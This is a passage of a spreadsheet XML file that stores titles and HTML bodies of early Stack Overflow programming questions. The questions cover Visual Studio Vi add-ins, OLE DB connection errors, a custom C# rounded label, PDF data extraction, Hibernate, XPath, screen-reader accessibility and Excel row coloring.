  </si>
  <si>
    <t>Vi editing for Visual Studio</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm used to the Vi(m) editor and am using MS Visual Studio 2005 at work. I couldn't find a free Vi add-in (there's only one for the 2003 version). I googled a bit, saw that there was a 'Google summer of code' project this year to write such an add-in, and am eagerly awaiting the result. I've also heard of ViEmu (not free, and I can't test it at work).&lt;/p&gt;
&lt;p&gt;Has anyone in my situation has found a solution (and/or tested ViEmu)?&lt;/p&gt;
&lt;p&gt;Edit: I can't test ViEmu at work because they are paranoid about what we install on our boxes: it has to go through required channels, and for 30 days I don't reckon it's worth it (and I have no Windows box at home).&lt;/p&gt;
&lt;p&gt;Edit: Since both answers were equivalent, I ended up accepting the first one that came in.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why should you prevent a class from being subclassed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What can be reasons to prevent a class from being inherited? (e.g. using sealed on a c# class)
Right now I can't think of any.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Subversion with Visual Basic 6</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My team is moving from Visual SourceSafe to Subversion soon, while developing/supporting a legacy project in Visual Basic 6.0, so I have a couple of questions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What's the best tool for Subversion IDE integration in Visual Studio 6? (or is it not worth the trouble...)&lt;/li&gt;
&lt;li&gt;Are there any best practices for using Subversion with Visual Basic 6.0? (file types to ignore, etc.)&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>What is this 'Multiple-step OLE DB' error?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm doing a little bit of work on a horrid piece of software built by Bangalores best.&lt;/p&gt;
&lt;p&gt;It's written in mostly classic ASP/VbScript, but "ported" to ASP.NET, though most of the code is classic ASP style in the ASPX pages :(&lt;/p&gt;
&lt;p&gt;I'm getting this message when it tries to connect to my local database:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Multiple-step OLE DB operation generated errors. Check each OLE DB status value, if available. No work was done.&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Line 38:    MasterConn = New ADODB.Connection()
Line 39:    MasterConn.connectiontimeout = 10000
Line 40:        MasterConn.Open(strDB)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Anybody have a clue what this error means? Its connecting to my local machine (running SQLEXPRESS) using this connection string:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PROVIDER=MSDASQL;DRIVER={SQL Server};Server=JONATHAN-PC\SQLEXPRESS\;DATABASE=NetTraining;Integrated Security=true
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which is the connection string that it was initially using, I just repointed it at my database.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The issue was using "Integrated Security" with ADO. I changed to using a user account and it connected just fine.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C#.NET Winforms: Is it possible to override Label.Autosize?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't like the AutoSize property of the Label control. I have a custom Label that draws a fancy rounded border among other things. I'm placing a &lt;code&gt;AutoSize = false&lt;/code&gt; in my constructor, however, when I place it in design mode, the property always is True. &lt;/p&gt;
&lt;p&gt;I have overridden other properties with success but this one is happily ignoring me. Does anybody has a clue if this is "by MS design"?&lt;/p&gt;
&lt;p&gt;Here's the full source code of my Label in case anyone is interested.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using System.ComponentModel;
using System.Drawing;
using System.Drawing.Drawing2D;
using System.Windows.Forms;
namespace Dentactil.UI.WinControls
{
    [DefaultProperty("TextString")]
    [DefaultEvent("TextClick")]
    public partial class RoundedLabel : UserControl
    {
        private static readonly Color DEFAULT_BORDER_COLOR = Color.FromArgb( 132, 100, 161 );
        private const float DEFAULT_BORDER_WIDTH = 2.0F;
        private const int DEFAULT_ROUNDED_WIDTH = 16;
        private const int DEFAULT_ROUNDED_HEIGHT = 12;
        private Color mBorderColor = DEFAULT_BORDER_COLOR;
        private float mBorderWidth = DEFAULT_BORDER_WIDTH;
        private int mRoundedWidth = DEFAULT_ROUNDED_WIDTH;
        private int mRoundedHeight = DEFAULT_ROUNDED_HEIGHT;
        public event EventHandler TextClick;
        private Padding mPadding = new Padding(8);
        public RoundedLabel()
        {
            InitializeComponent();
        }
        public Cursor TextCursor
        {
            get { return lblText.Cursor; }
            set { lblText.Cursor = value; }
        }
        public Padding TextPadding
        {
            get { return mPadding; }
            set
            {
                mPadding = value;
                UpdateInternalBounds();
            }
        }
        public ContentAlignment TextAlign
        {
            get { return lblText.TextAlign; }
            set { lblText.TextAlign = value; }
        }
        public string TextString
        {
            get { return lblText.Text; }
            set { lblText.Text = value; }
        }
        public override Font Font
        {
            get { return base.Font; }
            set
            {
                base.Font = value;
                lblText.Font = value;
            }
        }
        public override Color ForeColor
        {
            get { return base.ForeColor; }
            set
            {
                base.ForeColor = value;
                lblText.ForeColor = value;
            }
        }
        public Color BorderColor
        {
            get { return mBorderColor; }
            set
            {
                mBorderColor = value;
                Invalidate();
            }
        }
        [DefaultValue(DEFAULT_BORDER_WIDTH)]
        public float BorderWidth
        {
            get { return mBorderWidth; }
            set
            {
                mBorderWidth = value;
                Invalidate();
            }
        }
        [DefaultValue(DEFAULT_ROUNDED_WIDTH)]
        public int RoundedWidth
        {
            get { return mRoundedWidth; }
            set
            {
                mRoundedWidth = value;
                Invalidate();
            }
        }
        [DefaultValue(DEFAULT_ROUNDED_HEIGHT)]
        public int RoundedHeight
        {
            get { return mRoundedHeight; }
            set
            {
                mRoundedHeight = value;
                Invalidate();
            }
        }
        private void UpdateInternalBounds()
        {
            lblText.Left = mPadding.Left;
            lblText.Top = mPadding.Top;
            int width = Width - mPadding.Right - mPadding.Left;
            lblText.Width = width &amp;gt; 0 ? width : 0;
            int heigth = Height - mPadding.Bottom - mPadding.Top;
            lblText.Height = heigth &amp;gt; 0 ? heigth : 0;
        }
        protected override void OnLoad(EventArgs e)
        {
            UpdateInternalBounds();
            base.OnLoad(e);
        }
        protected override void OnPaint(PaintEventArgs e)
        {
            SmoothingMode smoothingMode = e.Graphics.SmoothingMode;
            e.Graphics.SmoothingMode = SmoothingMode.AntiAlias;
            int roundedWidth = RoundedWidth &amp;gt; (Width - 1)/2 ? (Width - 1)/2 : RoundedWidth;
            int roundedHeight = RoundedHeight &amp;gt; (Height - 1)/2 ? (Height - 1)/2 : RoundedHeight;
            GraphicsPath path = new GraphicsPath();
            path.AddLine(0, roundedHeight, 0, Height - 1 - roundedHeight);
            path.AddArc(new RectangleF(0, Height - 1 - 2*roundedHeight, 2*roundedWidth, 2*roundedHeight), 180, -90);
            path.AddLine(roundedWidth, Height - 1, Width - 1 - 2*roundedWidth, Height - 1);
            path.AddArc(new RectangleF(Width - 1 - 2*roundedWidth, Height - 1 - 2*roundedHeight, 2*roundedWidth, 2*roundedHeight), 90, -90);
            path.AddLine(Width - 1, Height - 1 - roundedHeight, Width - 1, roundedHeight);
            path.AddArc(new RectangleF(Width - 1 - 2*roundedWidth, 0, 2*roundedWidth, 2*roundedHeight), 0, -90);
            path.AddLine(Width - 1 - roundedWidth, 0, roundedWidth, 0);
            path.AddArc(new RectangleF(0, 0, 2*roundedWidth, 2*roundedHeight), -90, -90);
            e.Graphics.DrawPath(new Pen(new SolidBrush(BorderColor), BorderWidth), path);
            e.Graphics.SmoothingMode = smoothingMode;
            base.OnPaint(e);
        }
        protected override void OnResize(EventArgs e)
        {
            UpdateInternalBounds();
            base.OnResize(e);
        }
        private void lblText_Click(object sender, EventArgs e)
        {
            if (TextClick != null)
            {
                TextClick(this, e);
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(there are some issues with Stack Overflow's markup and the Underscore, but it's easy to follow the code).&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I have actually removed that override some time ago when I saw that it wasn't working. I'll add it again now and test. Basically I want to replace the Label with some new label called: IWillNotAutoSizeLabel ;)&lt;/p&gt;
&lt;p&gt;I basically hate the autosize property "on by default".&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Inserting at the very end in FCKeditor</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;FCKeditor has InsertHtml API (&lt;a href="http://docs.fckeditor.net/FCKeditor_2.x/Developers_Guide/JavaScript_API" rel="nofollow"&gt;JavaScript API document&lt;/a&gt;) that inserts HTML in the current cursor position. How do I insert at the very end of the document?&lt;/p&gt;
&lt;p&gt;Do I need to start browser sniffing with something like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if ( element.insertAdjacentHTML )    // IE 
    element.insertAdjacentHTML( 'beforeBegin',  html ) ; 
else                                // Gecko 
{ 
    var oRange = document.createRange() ; 
    oRange.setStartBefore( element ) ; 
    var oFragment = oRange.createContextualFragment( html ); 
    element.parentNode.insertBefore( oFragment,  element ) ; 
} 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or is there a blessed way that I missed?&lt;/p&gt;
&lt;p&gt;Edit: Of course, I can rewrite the whole HTML, as answers suggest, but I cannot believe that is the "blessed" way. That means that the browser should destroy whatever it has and re-parse the document from scratch. That cannot be good. For example, I expect that to break the undo stack.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Abstraction away from CSS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let me make something quite clear.&lt;/p&gt;
&lt;p&gt;I. &lt;strong&gt;Hate&lt;/strong&gt;. CSS.&lt;/p&gt;
&lt;p&gt;It is a never-ending nightmare. Every minor layout change feels like a hack. Solutions to problems seem to often involve jiggering numbers around like some chef trying to work out exactly how much nutmeg to put in his soon-to-be famous rice pudding. Then comes the multiple browser issue, the multiple resolution issues..&lt;/p&gt;
&lt;p&gt;.. to cut a long story short, it's a pain. A PITA, if you will.&lt;/p&gt;
&lt;p&gt;Many frameworks seek to abstract away from HTML (custom tags, JSFs component system) in an effort to make dealing with that particular kettle of fish easier.&lt;/p&gt;
&lt;p&gt;Is there anything you folks have used that has a similar concept applied to CSS? Something that does a bunch of cross-browser magic for you, supports like variables (why do I have to type #3c5c8d every time I want that colour), supports caclulated fields (which are 'compiled' into CSS and JS), etc.&lt;/p&gt;
&lt;p&gt;Alternatively, am I even thinking about this correctly? Am I trying to push a very square block through a very round hole? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Asynchronous Stored Procedure Calls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to call a stored prodcedure from another stored procedure asynchronously?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; Specifically I'm working with a DB2 database.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Method to run a Java Application as a *nix Daemon or Windows Service?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for the best method to run a Java Application as a *NIX daemon or a Windows Service.  I've looked in to the &lt;a href="http://wrapper.tanukisoftware.org/"&gt;Java Service Wrapper&lt;/a&gt;, the &lt;a href="http://commons.apache.org/daemon/jsvc.html"&gt;Apache Commons project 'jsvc'&lt;/a&gt;, and the &lt;a href="http://commons.apache.org/daemon/procrun.html"&gt;Apache Commons project 'procrun'&lt;/a&gt;.  So far, the Java Service Wrapper looks like it's the best option... but, I'm wondering if there are any other "Open Source friendly" licensed products out there.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to import/read data from pdf files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We get a large amount of data from our clients in pdf files in varying formats [layout-wise], these files are typically report output, and are typically properly annotated [they don't usually need OCR], but not formatted well enough that simply copying several hundred pages of text out of acrobat is not going to work.&lt;/p&gt;
&lt;p&gt;The best approach I've found so far is to write a script to parse the nearly-valid xml output (the comments are invalid and many characters are escaped in varying ways, Ã© becomes [[[e9]]]Ã©, $ becomes \$, % becomes \%...) of the command-line pdftoipe utility (to convert pdf files for a program called &lt;a href="http://tclab.kaist.ac.kr/ipe/" rel="nofollow"&gt;ipe&lt;/a&gt;), which gives me text elements with their positions on each page [see sample below], which works well enough for reports where the same values are on the same place on every page I care about, but would require extra scripting effort for importing matrix [cross-tab] pdf files. pdftoipe is not at all intended for this, and at best can be compiled manually using cygwin for windows.&lt;/p&gt;
&lt;p&gt;Are there libraries that make this easy from some scripting language I can tolerate?  A graphical tool would be awesome too.  And a pony. &lt;/p&gt;
&lt;p&gt;pdftoipe output of &lt;a href="http://brunndahl.navarro.se/sida_002/?CoMeT_function=get_file&amp;amp;id=9_1" rel="nofollow" title="sample pdf file"&gt;this sample&lt;/a&gt; looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ipe creator="pdftoipe 2006/10/09"&amp;gt;&amp;lt;info media="0 0 612 792"/&amp;gt;
&amp;lt;-- Page: 1 1 --&amp;gt;
&amp;lt;page gridsize="8"&amp;gt;
&amp;lt;path fill="1 1 1" fillrule="wind"&amp;gt;
64.8 144 m
486 144 l
486 727.2 l
64.8 727.2 l
64.8 144 l
h
&amp;lt;/path&amp;gt;
&amp;lt;path fill="1 1 1" fillrule="wind"&amp;gt;
64.8 144 m
486 144 l
486 727.2 l
64.8 727.2 l
64.8 144 l
h
&amp;lt;/path&amp;gt;
&amp;lt;path fill="1 1 1" fillrule="wind"&amp;gt;
64.8 144 m
486 144 l
486 727.2 l
64.8 727.2 l
64.8 144 l
h
&amp;lt;/path&amp;gt;
&amp;lt;text stroke="1 0 0" pos="0 0" size="18" transformable="yes" matrix="1 0 0 1 181.8 707.88"&amp;gt;This is a sample PDF fil&amp;lt;/text&amp;gt;
&amp;lt;text stroke="1 0 0" pos="0 0" size="18" transformable="yes" matrix="1 0 0 1 356.28 707.88"&amp;gt;e.&amp;lt;/text&amp;gt;
&amp;lt;text stroke="1 0 0" pos="0 0" size="18" transformable="yes" matrix="1 0 0 1 368.76 707.88"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 692.4"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 677.88"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 663.36"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 648.84"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 634.32"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 619.8"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 605.28"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 590.76"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 576.24"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 561.72"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 547.2"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 532.68"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 518.16"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 503.64"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 489.12"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 67.32 474.6"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 1" pos="0 0" size="16.2" transformable="yes" matrix="1 0 0 1 67.32 456.24"&amp;gt;If you can read this&amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 1" pos="0 0" size="16.2" transformable="yes" matrix="1 0 0 1 214.92 456.24"&amp;gt;,&amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 1" pos="0 0" size="16.2" transformable="yes" matrix="1 0 0 1 219.48 456.24"&amp;gt; you already have A&amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 1" pos="0 0" size="16.2" transformable="yes" matrix="1 0 0 1 370.8 456.24"&amp;gt;dobe Acrobat &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 1" pos="0 0" size="16.2" transformable="yes" matrix="1 0 0 1 67.32 437.64"&amp;gt;Reader i&amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 1" pos="0 0" size="16.2" transformable="yes" matrix="1 0 0 1 131.28 437.64"&amp;gt;n&amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 1" pos="0 0" size="16.2" transformable="yes" matrix="1 0 0 1 141.12 437.64"&amp;gt;stalled on your computer.&amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0 0" pos="0 0" size="16.2" transformable="yes" matrix="1 0 0 1 337.92 437.64"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;text stroke="0 0.502 0" pos="0 0" size="12.6" transformable="yes" matrix="1 0 0 1 342.48 437.64"&amp;gt; &amp;lt;/text&amp;gt;
&amp;lt;image width="800" height="600" rect="-92.04 800.64 374.4 449.76" ColorSpace="DeviceRGB" BitsPerComponent="8" Filter="DCTDecode" length="369925"&amp;gt;
feedcafebabe...
&amp;lt;/image&amp;gt;
&amp;lt;/page&amp;gt;
&amp;lt;/ipe&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What is the best free memory leak detector for a C/C++ program and its plug-in DLLs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a .exe and many plug-in .dll modules that the .exe loads. (I have source for both.) A cross-platform (with source) solution would be ideal, but the platform can be narrowed to WinXP and Visual Studio (7.1/2003 in my case).&lt;/p&gt;
&lt;p&gt;The built-in VS leak detector only gives the line where new/malloc was called from, but I have a wrapper for allocations, so a full symbolic stack trace would be best.&lt;/p&gt;
&lt;p&gt;The detector would also be able to detect for a leak in both the .exe and its accompanying plug-in .dll modules.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ruby Performance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm pretty keen to develop my first Ruby app, as my company has finally blessed its use internally.&lt;/p&gt;
&lt;p&gt;In everything I've read about Ruby up to v1.8, there is never anything positive said about performance, but I've found nothing about version 1.9. The last figures I saw about 1.8 had it drastically slower than just about everything out there, so I'm hoping this was addressed in 1.9.&lt;/p&gt;
&lt;p&gt;Has performance drastically improved? Are there some concrete things that can be done with Ruby apps (or things to avoid) to keep performance at the best possible level?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to connect and use a sqlite database from C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've done this before in C++ by including sqlite.h but is there a similarly easy way in C#?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Revoke shared folders in windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Over the last few months/years, I have shared a folder or two with numerous people on my domain. How do I easily revoke those shares to keep access to my system nice and tidy?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Asp.net website first start is very slow</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The first time I load the website in the production web server, it start very slow, subsequent pages load very quickly (included the home page).&lt;/p&gt;
&lt;p&gt;I precompiled the site, but nothing changes. &lt;/p&gt;
&lt;p&gt;I don't have any code at Application start.
I don't have cached items.&lt;/p&gt;
&lt;p&gt;Any ideas? How can I find out what is happening?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hibernate saveOrUpdate with another object in the session</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to save an object using Hibernate if there is already an object using that identifier loaded into the session?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Doing session.contains(obj) seems to only return true if the session contains that exact object, not another object with the same ID.&lt;/li&gt;
&lt;li&gt;Using merge(obj) throws an exception if the object is new&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>sizeof() equivalent for reference types?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a way to get the size of an instance of a reference type. sizeof is only for value types. Is this possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to set encoding in .getJSON JQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my web app, I submit some form fields with jQuery &lt;code&gt;$.getJSON()&lt;/code&gt; Method. I am having some problems with the encoding. The character-set of my app is &lt;code&gt;charset=ISO-8859-1&lt;/code&gt; but I think these fields are submitted with &lt;code&gt;UTF-8&lt;/code&gt;. &lt;/p&gt;
&lt;p&gt;Does anyone know, how I can set encoding in &lt;code&gt;$.getJSON&lt;/code&gt; calls? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is my PDF footer text invisible?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating PDFs on-demand with ColdFusion's &lt;a href="http://cfquickdocs.com/cf8/?getDoc=cfdocument" rel="nofollow"&gt;CFDocument&lt;/a&gt; tag, like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;cfdocument format="PDF" filename="#attributes.fileName#" overwrite="true"&amp;gt;
    &amp;lt;cfdocumentitem type="footer"&amp;gt;
        &amp;lt;table border="0" cellpadding="0" cellspacing="0" width="100%"&amp;gt;
            &amp;lt;tr&amp;gt;
                &amp;lt;td align="left"&amp;gt;&amp;lt;font face="Tahoma" color="black"&amp;gt;&amp;lt;strong&amp;gt;My Client's Corporation&amp;lt;/strong&amp;gt;&amp;lt;br/&amp;gt;Street address&amp;lt;br/&amp;gt;City, ST 55555&amp;lt;/font&amp;gt;&amp;lt;/td&amp;gt;
                &amp;lt;td align="right"&amp;gt;&amp;lt;font face="Tahoma" color="black"&amp;gt;Phone: 555.555.5555&amp;lt;br/&amp;gt;Fax: 555.555.5555&amp;lt;br/&amp;gt;Email: info@domain.com&amp;lt;/font&amp;gt;&amp;lt;/td&amp;gt;
            &amp;lt;/tr&amp;gt;
        &amp;lt;/table&amp;gt;
    &amp;lt;/cfdocumentitem&amp;gt;
    &amp;lt;html&amp;gt;
        &amp;lt;body&amp;gt;
            &amp;lt;table border="0" cellpadding="0" cellspacing="0" width="100%"&amp;gt;
            &amp;lt;!--- some content here ... ---&amp;gt;
            &amp;lt;/table&amp;gt;
        &amp;lt;/body&amp;gt;
    &amp;lt;/html&amp;gt;
&amp;lt;/cfdocument&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem I'm having is that sometimes (actually, most of the time, but not always) &lt;strong&gt;&lt;em&gt;some&lt;/em&gt;&lt;/strong&gt; of the footer text is there, but invisible. I can highlight it and copy/paste it into notepad, where I can see it all -- but in the generated PDF only the first line of the left column of the footer is visible, the rest is invisible. Hence why I added the font color of black in the code.&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.stack.imgur.com/LHZ96.png" alt="screenshot of problem"&gt;&lt;/p&gt;
&lt;p&gt;Any ideas on how to correct this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parse string to TimeSpan</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some strings of xxh:yym format where xx is hours and yy is minutes like "05h:30m". What is an elegant way to convert a string of this type to TimeSpan?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XPath and Selecting a single node</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using XPath in .NET to parse an XML document, along the lines of:&lt;/p&gt;
&lt;pre class="lang-cs prettyprint-override"&gt;&lt;code&gt;XmlNodeList lotsOStuff = doc.SelectNodes("//stuff");
foreach (XmlNode stuff in lotsOStuff)
{
   XmlNode stuffChild = stuff.SelectSingleNode("//stuffChild");
   // ... etc
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The issue is that the XPath Query for &lt;code&gt;stuffChild&lt;/code&gt; is always returning the child of the first &lt;code&gt;stuff&lt;/code&gt; element, never the rest. Can XPath not be used to query against an individual &lt;code&gt;XMLElement&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Limitations of screen readers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a web developer, and I want to make the web sites I develop more accessible to those using screen readers.  What limitations do screen readers have that I should be most aware of, and what can I do to avoid hitting these limitations.&lt;/p&gt;
&lt;p&gt;This question was sparked by reading another question about &lt;a href="http://stackoverflow.com/questions/8472/best-non-image-based-captcha" rel="nofollow"&gt;non-image based captchas&lt;/a&gt;.  In there, a commenter said that honey pot form fields (form fields hidden with CSS that only a bot would fill in), are a bad idea, because screen readers would still pick them up. &lt;/p&gt;
&lt;p&gt;Are screen readers really so primitive that they would read text that isn't even displayed on the screen?  Ideally, couldn't you make a screen reader that waited until the page was finished loading, applied all css, and even ran Javascript onload functions before it figured out what was actually displayed, and then read that off to the user?  You could probably even identify parts of the page that are menus or table of contents, and give some sort of easy way for those parts to be read exclusively or skipped over. I would think that the programming community could come up with a better solution to this problem.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Alternating coloring groups of rows in Excel</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an Excel Spreadsheet like this&lt;/p&gt;
&lt;pre&gt;
id | data for id
   | more data for id
id | data for id
id | data for id
   | more data for id
   | even more data for id
id | data for id
   | more data for id
id | data for id
id | data for id
   | more data for id
&lt;/pre&gt;
&lt;p&gt;Now I want to group the data of one id by alternating the background color of the rows&lt;/p&gt;
&lt;pre&gt;
var color = white
for each row
    if the first cell is not empty and color is white
        set color to green
    if the first cell is not empty and color is green
        set color to white
    set background of row to color
&lt;/pre&gt;
&lt;p&gt;Can anyone help me with a macro or some VBA code&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Comparing Arrays of Objects in JavaScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to compare 2 arrays of objects in JavaScript code.  The objects have 8 total properties, but each object will not have a value for each, and the arrays are never going to be any larger than 8 items each, so maybe the brute force method of traversing each and then looking at the values of the 8 properties is the easiest way to do what I want to do, but before implementing, I wanted to see if anyone had a more elegant solution. Any thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to convert std::string to LPCWSTR in C++ (Unicode)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a method, or a code snippet for converting std::string to LPCWSTR&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why aren't Enumerations Iterable?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Java 5 and above you have the foreach loop, which works magically on anything that implements &lt;code&gt;Iterable&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for (Object o : list) {
  doStuff(o);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, &lt;code&gt;Enumerable&lt;/code&gt; still does not implement &lt;code&gt;Iterable&lt;/code&gt;, meaning that to iterate over an &lt;code&gt;Enumeration&lt;/code&gt; you must do the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for(; e.hasMoreElements() ;) {
  doStuff(e.nextElement());
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anyone know if there is a reason why &lt;code&gt;Enumeration&lt;/code&gt; still does not implement &lt;code&gt;Iterable&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; As a clarification, I'm not talking about the language concept of an &lt;a href="http://en.wikipedia.org/wiki/Enumerated_type" rel="nofollow"&gt;enum&lt;/a&gt;, I'm talking a Java-specific class in the Java API called '&lt;a href="http://java.sun.com/j2se/1.5.0/docs/api/java/util/Enumeration.html" rel="nofollow"&gt;Enumeration&lt;/a&gt;'. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find number of files with a specific extension, in all subdirectories</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to find the number of files of a specific type without having to loop through all results inn a Directory.GetFiles() or similar method? I am looking for something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int ComponentCount = MagicFindFileCount(@"c:\windows\system32", "*.dll");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know that I can make a recursive function to call Directory.GetFiles , but it would be much cleaner if I could do this without all the iterating.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; If it is not possible to do this without recursing and iterating yourself, what would be the best way to do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add (simple) tracing in C#?</t>
  </si>
  <si>
